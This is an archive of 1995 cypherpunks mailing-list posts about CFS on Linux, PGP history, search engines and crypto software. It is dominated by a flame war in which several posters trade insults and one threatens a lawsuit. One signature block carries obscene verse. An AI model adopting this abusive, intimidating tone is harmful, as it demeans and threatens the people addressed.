Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sun, 24 Dec 1995 07:44:11 +0800
To: aba@atlas.ex.ac.uk
Subject: Re: PGP timeline FAQ... comments requested
In-Reply-To: <297.9512221337@exe.dcs.exeter.ac.uk>
Message-ID: <2QF3w8m9LgHf085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Not to belittle something that is the obvious result of painstaking work;
but I think the timeline FAQ can be improved in two general ways:

(1)  More of the specific events should be specifically dated; and

(2)  I think it would be appropriate to include a version history of PGP.  
Among other things, I think it appropriate to note the distinction between
PRZ's own Bass-o-matic conventional encryption in the earliest versions and
the use of IDEA in later versions.

These comments aside, you've done an excellent job, and the facts you present
jibe well with my own understanding.

- -- 
   Alan Bostick             | SWINDON:   What will history say?
Seeking opportunity to      | BURGOYNE:  History, sir, will tell lies as usual.
develop multimedia content. |    George Bernard Shaw, THE DEVIL'S DISCIPLE
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMNxVXeVevBgtmhnpAQHJ1QMAmkcQCxoXN5RW4TaviA6yN8BG4aKF2kHh
98/+2WJDrht15SBNna7M1cclT3k0nb4bY2gTIQpCi080vw6tZVhYMRs+lvBjgbLm
7lGyDvdAzAr6azliI6DKwrL7n8aflRiB
=dPNR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 00:50:42 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <199512230317.TAA19444@jobe.shell.portal.com>
Message-ID: <199512231615.LAA06929@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alice B. Cohen writes:
anonymous-remailer@shell.portal.com writes:
> >  1: please make it install 'out-of-the-box' on Linux.
> 
> AT&T's refusal to support CFS and other so-called "secure" software
> under Linux is typical and to be expected.

God, you are an obnoxious prick.

First of all, this is Matt Blaze's pet project, not a product of
AT&T. It is given away for free and you should be happy to get it at
all -- no one is obligated to give you a gift. Have you mailed him a
Linux machine to do his testing on? Why do you assume he even has one?
As it happens, he doesn't, and probably doesn't want to go through the
hassle of paying for a computer and putting Linux on it.

Be happy he's given you anything at all.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 01:14:26 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: CFS and Linux (fwd)
In-Reply-To: <199512231633.KAA04297@einstein>
Message-ID: <199512231640.LAA07020@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
> 
> > First of all, this is Matt Blaze's pet project, not a product of
> > AT&T. It is given away for free and you should be happy to get it at
> > all -- no one is obligated to give you a gift. Have you mailed him a
> > Linux machine to do his testing on? Why do you assume he even has one?
> > As it happens, he doesn't, and probably doesn't want to go through the
> > hassle of paying for a computer and putting Linux on it.
> > 
> > Be happy he's given you anything at all.
> 
> If you are going to do it, do it right the first time.
> 
> Second, I really doubt Blaze has a problem obtaining access to computing
> power and a $25 CD should be within his budget.

Setting up and doing work on a new operating system is *WORK*. It
takes time. It takes space in your lab or office. Maybe he just
doesn't feel like spending that time, effort, and lab budget. Why
should he? CFS is a GIFT. It isn't a product. Maybe if you paid
someone to maintain a Linux version you would have one, but you aren't
paying a penny. Quit looking a gift horse in the mouth.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 01:48:31 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <9512231705.AA21041@all.net>
Message-ID: <199512231733.MAA07103@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Fred Cohen writes to me in private:
> > Alice B. Cohen writes:
> 
> If you mean to imply that I am Alice, that constitutes slander, and I
> will sue.

I'd love to see you try. Please, sue me immediately.

Since you agree in public with Alice practically all the time, the
damages would be fascinating to assess. "Your honor, my client, who
has no reputation in the group we are discussing to speak of, feels
that by being publicly conflated with this anonymous personage whose
opinions he universally agrees with that his reputation has been
damaged, since, well, er, we aren't sure why, but it has. I mean,
people might ascribe opinions to him that he claims to hold! Obviously
that must be damaging!"

What would the monetary damages be, Fred? I mean, there are some
people here who would gain a bit of added respect for you since being
Alice would imply that you knew how to use anonymous remailers, so
there would be some evidence that you could do *something*, which many
people here had in doubt up until now. I suspect you actually gain
reputation that way, so perhaps I should sue you for unjust
enrichment. (*)

Perry

(* Not close captioned for the sarcasm impaired.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steve@miranova.com (Steven L. Baur)
Date: Sun, 24 Dec 1995 05:05:38 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Alta Vista caches queries
In-Reply-To: <199512220220.DAA27203@utopia.hacktic.nl>
Message-ID: <m2hgyr5x07.fsf_-_@diana.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Hieronymous" == Anonymous  <nobody@REPLAY.COM> writes:

    Hieronymous> Here's one more
    Hieronymous> reason to worry about the implications of web search
    Hieronymous> engines: I just stopped in on Digital's new Alta
    Hieronymous> Vista page, and was surprised to find that the query
    Hieronymous> field was filled in--with a search I ran 3 or 4 days
    Hieronymous> ago.

I see no evidence whatsoever that caching is taking place.  The
Alta Vista robot browsed the web site I manage for months prior to
public release, and behaved in exemplary fashion.  In short, they
appear to be managed by people who know what they're doing.  There's
nothing sinister about Alta Vista IMHO.

Furthermore, no one has mentioned the positive changes made to
Dejanews since it got bashed thoroughly on this list a few weeks ago.
They've significantly turned down the amount of old information
indexed, and have restricted the groups (and mailing lists) they
archive.

-- 
steve@miranova.com baur




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 24 Dec 1995 04:27:54 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <199512231615.LAA06929@jekyll.piermont.com>
Message-ID: <LFRkgD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:
> Alice B. Cohen writes:
> anonymous-remailer@shell.portal.com writes:
> > >  1: please make it install 'out-of-the-box' on Linux.

I have the impression that the vast majority of free Unix stuff, even
systems-related, runs well under Linux. Some programs have problems with flavors
of Unix. E.g., I remember how much trouble it was to get pcomm to run under
SunOS. I see nothing at all "obnoxious" about this polite request to fix CFS. I
see tons of polite requests to fix free stuff on Usenet.

> > AT&T's refusal to support CFS and other so-called "secure" software
> > under Linux is typical and to be expected.
>
> God, you are an obnoxious prick.
>
> First of all, this is Matt Blaze's pet project, not a product of
> AT&T. It is given away for free and you should be happy to get it at
> all -- no one is obligated to give you a gift. Have you mailed him a
> Linux machine to do his testing on? Why do you assume he even has one?
> As it happens, he doesn't, and probably doesn't want to go through the
> hassle of paying for a computer and putting Linux on it.

Perry, one doesn't need to mail someone a Linux machine, or pay for a new
computer. One can install it easily in a partition on a non-dedicated PC
running Windows, and boot it and MS DOS alternatively. I got the latest Linux
CD for $12 from Morse Communications. Or, one can download Linux. Most people
have an Intel box somewhere. Linux is free, and comes with source code.

Everyone I know who writes code seriously has at least tried Linux. Not everyone
uses it for serious work, but everyone at least played with it. Not having even
tried suggests (to me) a regrettable lack of intellectual curiosity.

After using both Linux and SCO Unix extensively on Intel boxes, I can attest
that Linux is much less buggy and better supported (via Usenet) than SCO.

(*Unix is no longer a trademark of AT&T Bell Labs)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 03:14:20 +0800
To: cypherpunks@toad.com
Subject: Fred Cohen: Re: CFS and Linux
Message-ID: <199512231823.NAA07160@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I thought people would love to see this.

Note especially "Dr." Fred's threat to have toad.com confiscated as
part of a conspiracy against his reputation.

Perry

------- Forwarded Message

From: fc@all.net (Fred Cohen)
Message-Id: <9512231757.AA22460@all.net>
Subject: Re: CFS and Linux
To: perry@piermont.com
Date: Sat, 23 Dec 1995 12:57:40 -0500 (EST)
In-Reply-To: <199512231733.MAA07103@jekyll.piermont.com> from "Perry E. Metzger" at Dec 23, 95 12:33:15 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
X-UIDL: 819742624.003

> Fred Cohen writes to me in private:
> > > Alice B. Cohen writes:
> > 
> > If you mean to imply that I am Alice, that constitutes slander, and I
> > will sue.
> 
> I'd love to see you try. Please, sue me immediately.
> 
> Since you agree in public with Alice practically all the time, the
> damages would be fascinating to assess. "Your honor, my client, who
> has no reputation in the group we are discussing to speak of, feels
> that by being publicly conflated with this anonymous personage whose
> opinions he universally agrees with that his reputation has been
> damaged, since, well, er, we aren't sure why, but it has. I mean,
> people might ascribe opinions to him that he claims to hold! Obviously
> that must be damaging!"

To the contrary, I have a very good global reputation, and you are
knowingly and maliciously attempting to slander me by claiming that
I use a false identity to support my positions.

> What would the monetary damages be, Fred? I mean, there are some
> people here who would gain a bit of added respect for you since being
> Alice would imply that you knew how to use anonymous remailers, so
> there would be some evidence that you could do *something*, which many
> people here had in doubt up until now. I suspect you actually gain
> reputation that way, so perhaps I should sue you for unjust
> enrichment. (*)

Let's see.  I guess I would start by having the police confiscate the
toad.com computers because they are part of a criminal conspiracy to
damage my reputation.  Criminal because of the recent changes in the
law that prohibit you from sending me information I don't want to get.

The dollar value would be $1 plus a public apology plus all costs of the
suit plus my time to right the wrong (at my usual fee of course).  Of
course the fact that you have decided to make this posting in public
justifies my extensive efforts to clear my reputation which, unless you
apologize immediately will be surprisingly enjoyable for me.

- -> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 03:13:10 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: CFS and Linux
In-Reply-To: <9512231757.AA22460@all.net>
Message-ID: <199512231833.NAA07171@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Fred Cohen writes:
> The dollar value would be $1 plus a public apology plus all costs of the
> suit plus my time to right the wrong (at my usual fee of course).  Of
> course the fact that you have decided to make this posting in public
> justifies my extensive efforts to clear my reputation which, unless you
> apologize immediately will be surprisingly enjoyable for me.

Go and sue, Fred. It's what I have lawyers for. If you can even find an
attorney willing to take your "case", mine will likely remind yours
that lawyers can now be punished by the court in many jurisdictions
for knowingly aiding in bringing frivolous suits. If you are seeking
$1 in damages the court is especially likely to consider the whole
thing a waste of time.

I think you will find that I'm very, very hard to intimidate. Don't
bother "giving me a second chance" or any such stuff. Either find a
lawyer stupid enough to risk his license by taking this case and let
me know you are suing me by sending over a process server, or quit
bothering me.

> Let's see.  I guess I would start by having the police confiscate the
> toad.com computers because they are part of a criminal conspiracy to
> damage my reputation.  Criminal because of the recent changes in the
> law that prohibit you from sending me information I don't want to get.

I think you will find that John Gilmore is even more difficult to
intimidate than I am.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 03:32:38 +0800
To: cypherpunks@toad.com
Subject: Fred Cohen: Re: CFS and Linux
Message-ID: <199512231845.NAA07203@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



More Fun from Fred. For those that haven't been following, he
threatened to sue me for quoting an Alice post as "Alice B. Cohen",
and threatened to have his attorneys seize the machines the
cypherpunks mailing lists run on for being part of a "criminal
conspiracy" against him.

Perry

------- Forwarded Message

From: fc@all.net (Fred Cohen)
Message-Id: <9512231834.AA23326@all.net>
Subject: Re: CFS and Linux
To: perry@piermont.com
Date: Sat, 23 Dec 1995 13:34:49 -0500 (EST)
In-Reply-To: <199512231833.NAA07171@jekyll.piermont.com> from "Perry E. Metzger" at Dec 23, 95 01:33:45 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
X-UIDL: 819744158.001

> Fred Cohen writes:
> > The dollar value would be $1 plus a public apology plus all costs of the
> > suit plus my time to right the wrong (at my usual fee of course).  Of
> > course the fact that you have decided to make this posting in public
> > justifies my extensive efforts to clear my reputation which, unless you
> > apologize immediately will be surprisingly enjoyable for me.
> 
> Go and sue, Fred. It's what I have lawyers for. If you can even find an
> attorney willing to take your "case", mine will likely remind yours
> that lawyers can now be punished by the court in many jurisdictions
> for knowingly aiding in bringing frivolous suits. If you are seeking
> $1 in damages the court is especially likely to consider the whole
> thing a waste of time.

Your choice, but it's not a very nice Christmas present to find yourself
in litigation.  I'll give you till Tuesday to reconsider.  If I see the
public apology, I won't call the lawyers.

If I were you, I would talk to those lawyers of yours and get their
opinion of whether it's worth your while to be malicious toward people
in this way in exchange for defending against a law suit when all you
have to do to prevent it is apologize for what you now know to be a
falsehood.

- -> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Dec 1995 03:40:36 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: CFS and Linux
In-Reply-To: <9512231834.AA23326@all.net>
Message-ID: <199512231855.NAA07214@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Fred Cohen writes:
> > Go and sue, Fred. It's what I have lawyers for. If you can even find an
> > attorney willing to take your "case", mine will likely remind yours
> > that lawyers can now be punished by the court in many jurisdictions
> > for knowingly aiding in bringing frivolous suits. If you are seeking
> > $1 in damages the court is especially likely to consider the whole
> > thing a waste of time.
> 
> Your choice, but it's not a very nice Christmas present to find yourself
> in litigation.  I'll give you till Tuesday to reconsider.  If I see the
> public apology, I won't call the lawyers.

As I said, Fred, quit giving me "second chances"; either send the
process server with the court papers or let the matter drop. Don't
bother sending any more "just one more chance" messages to me -- I
won't be altering my opinion.

As for apologies, I have nothing to apologize for, so I have no
intention of apologizing to you -- ever.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (J.Francois)
Date: Sun, 24 Dec 1995 04:12:32 +0800
To: perry@piermont.com (Perry E. Metzger)
Subject: Re: Fred Cohen
In-Reply-To: <199512231845.NAA07203@jekyll.piermont.com>
Message-ID: <m0tTZVN-000xgEC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

While browsing my mail I noticed that Perry E. Metzger wrote:
 
 
> More Fun from Fred. For those that haven't been following, he
> threatened to sue me for quoting an Alice post as "Alice B. Cohen",
> and threatened to have his attorneys seize the machines the
> cypherpunks mailing lists run on for being part of a "criminal
> conspiracy" against him.
> 
> Perry

Maybe the Jargon File offers some insight:


:Mbogo, Dr. Fred: /*m-boh'goh, dok'tr fred/ [Stanford] n. The
   archetypal man you don't want to see about a problem, esp. an
   incompetent professional; a shyster.  "Do you know a good eye
   doctor?"  "Sure, try Mbogo Eye Care and Professional Dry
   Cleaning."  The name comes from synergy between {bogus} and the
   original Dr. Mbogo, a witch doctor who was Gomez Addams' physician
   on the old "Addams Family" TV show.  Compare {Bloggs Family,
   the}, see also {fred}.

It all starts to make sense now.....

Long Live Procmail! 
Mail filtering is cool......

=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
=========================No Unsolicited Email============================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: The Gray-haired Woman's Complaint

My back aches, my pussy is sore;
I simply can't fuck any more;
	I'm covered with sweat,
	And Tu have

iQCVAgUBMNxWfrbmxeO+s+1xAQGTzAP/VA7pG3vFTwx+OTS1tNLdua6rgieSPyez
eXdVUbVaVqdxCuRwFlpxDbZjKeclx9D3TZyPnnUF/ZDQf/Tb89+d8iLRz3SROVTZ
a0RK5tOFB1/E/d4lWK+rtd4q6fB2se1/NGUE5dC7l97njyQfgBJNE8KdZc9lcLNP
C3f9b9fgZGM=
=zRqP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sun, 24 Dec 1995 04:45:20 +0800
To: cypherpunks@toad.com
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <199512231904.LAA00483@slack.lne.com>
Message-ID: <4bhndf$avo@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray <ericm@lne.com> writes:

>I'm sure a number of people, myself included, would be willing
>to host the CP list should "Dr" Fred make good his threat.

And a number of people would no doubt start boycotting Dr. Fred's company
loudly and publicly should he attack an innocent third party such as
toad.com.  Fred and Perry are two peas in a pod, but as long as they
keep their disputes strictly between them I could care less.
-- 
"Home pages are the pet rock of the 90s.  We all have them, we all think
 they're very cute.  But in a few years we're going to look back and be
 pretty embarrassed."     -- Tony Shepps <toad@pond.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 24 Dec 1995 04:45:49 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: CFS and Linux (fwd)
In-Reply-To: <199512231633.KAA04297@einstein>
Message-ID: <199512232014.PAA23147@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> If you are going to do it, do it right the first time.
> 
> Second, I really doubt Blaze has a problem obtaining access to computing
> power and a $25 CD should be within his budget.
> 

What, exactly, is your complaint?  I'm honestly confused.

Please see my previous message on this subject for an explanation of
the situation regarding CFS with respect to Linux.

I'm not "refusing to support" anything.  I want to do whatever it takes
to get CFS (and other applications of strong cryptography) as widely
deployed as possible.  I am unwilling to allow supporting CFS to become
a full-time job, however, and I'm not going to apologize for that.

I have a Linux machine, in fact.  But I've tried to run CFS on it and it
seems to work fine.  I've not investigated further because that seems like
a poor use of my time given the large number of Linux experts (who know far
more than I ever will about the vagaries of the various Linux releases) who
have not come up with a satisfactory, general patch that runs on all the
various Linux platforms.  The problem seems to be that some versions of Linux
include an rpcgen that produces non-standard output.  I don't have one
of those versions, however, so I've not encountered this "problem" myself.

Again, if you want to see CFS, or any other software that I distribute, run
on some platform that I don't have, you are welcome to send me patches that
I will happily wrap into the distribution (as long as it doesn't break the
other supported platforms).  Until you do that, you have nothing to whine
about.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 24 Dec 1995 08:29:40 +0800
To: cypherpunks@toad.com
Subject: apache/ssl now commercially available
Message-ID: <199512232359.PAA19453@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I've finally gotten the licensing taken care of. Whee!
http://www.c2.org/apachessl/

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sun, 24 Dec 1995 06:14:49 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: CFS and Linux
In-Reply-To: <LFRkgD11w165w@bwalk.dm.com>
Message-ID: <199512232154.QAA05863@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just to pick nits...

> Everyone I know who writes code seriously has at least tried
> Linux. Not everyone uses it for serious work, but everyone at least
> played with it. Not having even tried suggests (to me) a regrettable
> lack of intellectual curiosity.

I do serious development work under Linux.  For example, I've been
doing development of PGP 3 on an IBM Thinkpad running Linux.  So, I
can honestly say that I use Linux for serious work...

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 24 Dec 1995 11:22:50 +0800
To: cypherpunks@toad.com
Subject: Re: Air Force hacks Navy? Eeeek!
Message-ID: <199512240246.SAA10574@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:57 PM 12/22/95 -0500, fc@all.net (Fred Cohen) wrote:
>I thought the ET article indicated an exaggeration, but if it's true that
>there are no Battleships in the US Navy anymore and that the attack was
>run using DoD crypto equipment and networks, it's a heck of a lot
>different than buying an off-the-shelf Internet package and taking down
>the fleet.
>
>I have no doubt that someone with enough expertise, classified knowledge
>and equipment, access, and assistance can get some limited control over
>some US Navy ships for some period of time - but I seriously doubt that
>a computer whizzkid can take over the fleet from a PC via Email.

Depends on how much of a firewall the Navy's got; it may be that
the guy really did a dialin to the Pentagon using passwords,
or maybe that the ship really does have network connections
without adequate security.  People _do_ build dialin and other
gateways to get around corporate firewalls, in spite of
company policy; wouldn't surprise me if the military has the same problem.

About 20 years ago, you could dial an FX line in Des Moines which
connected to a line at Offutt AFB in Nebraska and autorotored to a radio
circuit up to Looking Glass.  Looking Glass had a small PBX; you could dial a 
2-digit extension to reach somebody on the plane, or dial back down
to the ground.  At one point, the radio officer on the plane noticed
two lights on on the PBX when nobody on the plane was talking on the phone;
the rapidly ensuing investigation found a guy in the barracks using 
a 16-button Autovon phone dialing through the system to call his buddies
in Guam.  As one might expect, the phone lines coming down from Looking Glass
are authorized to call anywhere in the world, at any precedence/preemption 
level they want to :-)  While I don't personally know either the radio
officer or the guy who got busted, I do have a friend who was around
there when it happened...  And similar nonsense is probably still possible
today, unless Murphy's left the military.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# .... Heading back to The Big Phone Company





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 24 Dec 1995 11:22:52 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: cyphernomicon FTP site?
Message-ID: <199512240247.SAA10588@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:07 AM 12/20/95 -0800, you wrote:
>At 12:59 AM 12/20/95 -0800, you wrote:
>>At 9:18 PM 12/19/95, Vinod Valloppillil wrote:
>>>Anyone know where I can FTP a full copy of the cyphernomicon?
>[Much deleted]
>>Anybody who plans to download the entire linear file and then print it out
>>must be missing a bits in his shift register.
>
>There are reasons to want a non-html version.  The best being uploading to
>your favorite text-oriented BBSes.  (Or crypto-oriented BBSes.)  Not
>everyone has access to the web.  (Yes, I know it is blasphemy...)

It's also nice to be able to read it offline, or feed it to grep,
or load copies of it to other sites to reduce congestion on Netcom...
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# .... Heading back to The Big Phone Company





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 24 Dec 1995 15:01:59 +0800
To: Eric Murray <perry@piermont.com (Perry E. Metzger)
Subject: Re: Fred Cohen: Re: CFS and Linux
Message-ID: <199512240623.WAA25485@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 12/23/95 -0800, Eric Murray wrote:
>I'd even be willing to testify in court as to the nature of
>Fred's reputation.  I'm sure the operator of the Firewalls list
>would be too.

Fred's reputation is so low he cannot be defamed.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 24 Dec 1995 15:01:37 +0800
To: cypherpunks@toad.com
Subject: Re: Fred Cohen: Re: CFS and Linux
Message-ID: <199512240623.WAA25488@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:05 PM 12/23/95 -0500, Steve Simmons wrote:
> Fred and Perry are two peas in pod,

Perry is an asshole.

Fred is a stupid ignorant asshole who talks nonsense.

Perry often mixes useful, accurate and informative information
in between the insults.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Sun, 24 Dec 1995 21:50:30 +0800
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Civility
Message-ID: <Pine.OSF.3.91.951223204036.5710D-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



Ladies and Gentlemen;
	As I am sure that most of you have noticed, this is a high volume 
list. I have just spent the last 20 minutes deleting personal attacks and 
non-crypto related junk from my mail. Normally, this list is of fairly 
high quality and I enjoy reading the technical and political discussions 
that appear here. It must be something in the water but lately the 
nonsense has reached epic proportions. 
	Now I realize that trying to get an independent bunch of people 
(as the cypherpunks must be) to conform to a minimum standard of behaviour 
is like herding cats ( I like that image! <g>) but in the interests of 
your fellow list members, please take the attacks to private E-mail. This 
might make the volume of crypto-related material manageable to the rest of us.
	Let the flames begin! ( In private E-mail please!)

	By the way, seasons greetings to everyone!

Tim Philp
Brantford, Ontario,
Canada

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 24 Dec 1995 13:29:03 +0800
To: cypherpunks@toad.com
Subject: Re: Java and timing info - second attempt
Message-ID: <199512240510.VAA03013@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 PM 12/18/95 -0800, Jeff Weinstein <jsw@netscape.com> wrote:
>  In Netscape Navigator 2.0 Java and JavaScript do not have access
>to crypto routines.  At some point in the future this will probably
>change, but only after we understand the implications much better
>than we do today.

Doug and/or Amanda Barnes posted some Java crypto stuff a while back,
I think using RSAREF; don't know the platform issues.

As far as timing goes, Bad Guys can always run accurate timing on 
their own machines, even if Innocent Victims don't on theirs.
However, it may be worthwhile to allow the Java browser users
to set the resolution on the clocks available to Java scripts.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# .... Heading back to The Big Phone Company





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 24 Dec 1995 14:03:32 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
Message-ID: <199512240544.VAA05521@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


So the master is at last fallen.  Kudos to Mr. Jim Choate and Dr.
Dimitri Vulis for having the courage of their convictions to help
unmask AT&T's deceit in claiming to support Linux and free software
when, in truth, it is doing just the opposite.

Maybe, just maybe, we can seize this opportunity to advance the
cause of justice, if not justice itself (true justice would require
AT&T to recognize its obligation to our heroes at Berkeley and pay
them their USD 25,000).  I call upon us all to expose AT&T for what
it is!  Had your software erased by the CFS install programme?
Return their own medicine!  Sue them!  Tired of Blaze's prattle
about how he is a Linux-lover even though he can't be bothered to
use Linux?  Challenge him!  Tired of AT&T and Netscape employees
stealing your resources?  Configure your servers to deny W3 access
to AT&T and Netscape computers!

Linux isn't perfect, but its open environment is a good start for
building REAL secure software.  Don't let AT&T's lies bully you
into abandoning it!  CFS will never run under Linux until it is
plucked from the monster's grasp.  We, too, are guilty when we
continue to invite the monster not only to walk in our midst
unchecked, but to sleep in our homes as an invited, nay, paid,
guest.


Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 24 Dec 1995 06:39:57 +0800
To: pagre@weber.ucsd.edu
Subject: Polish telco policy change
Message-ID: <199512232221.XAA26875@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Pardons requested from those who rightly try to keep Cypherpunks focused.

If any of you can think of ways to get this message out and about, you'd
be doing a Good Thing: without bandwidth, privacy means a lot less.


>------- Forwarded Message-------
>Date:          Tue, 19 Dec 1995 15:55:49 +0100 (MET)
>From:          Marta Dubrzynska <martad@pap.waw.pl>
>To:            Marjan Kokot <marjan@kud-fp.si>
>Subject:       Polish internet
>
>Dear Netpersonality,
>
>This is a request for help on behalf of the Polish internet. We 
>have one single internet provider in Poland: NASK. NASK has 
>because of an agreement with the Polish Telecom a 
>monopoly on lines connecting Poland with the rest of the world. 
>University's schools and commercial internet providers have to 
>get their access from NASK. 
>Prices of internet are high. A complete account with SLIP etc. 
